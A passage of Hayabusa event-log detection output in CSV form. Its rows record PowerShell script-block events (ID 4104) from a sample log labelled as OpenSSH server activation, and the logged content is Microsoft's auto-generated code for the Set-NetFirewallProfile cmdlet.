'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; 
